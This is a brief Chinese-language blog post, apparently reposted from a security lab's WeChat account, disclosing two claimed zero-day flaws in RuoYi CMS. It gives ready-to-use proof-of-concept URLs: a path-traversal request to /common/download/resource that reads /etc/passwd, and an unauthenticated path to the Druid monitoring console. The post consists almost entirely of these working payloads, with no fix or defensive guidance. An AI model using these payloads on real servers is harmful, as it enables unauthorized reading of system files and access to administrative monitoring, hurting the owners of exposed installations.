若依CMS 0day 任意文件读取 or 未授权访问

  • A+
所属分类:代码审计


若依CMS 0day 任意文件读取 or 未授权访问


若依管理系统后台任意文件读取


POC:


https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd


若依管理系统未授权访问


POC:


http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

本文始发于微信公众号(Khan安全攻防实验室):若依CMS 0day 任意文件读取 or 未授权访问

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: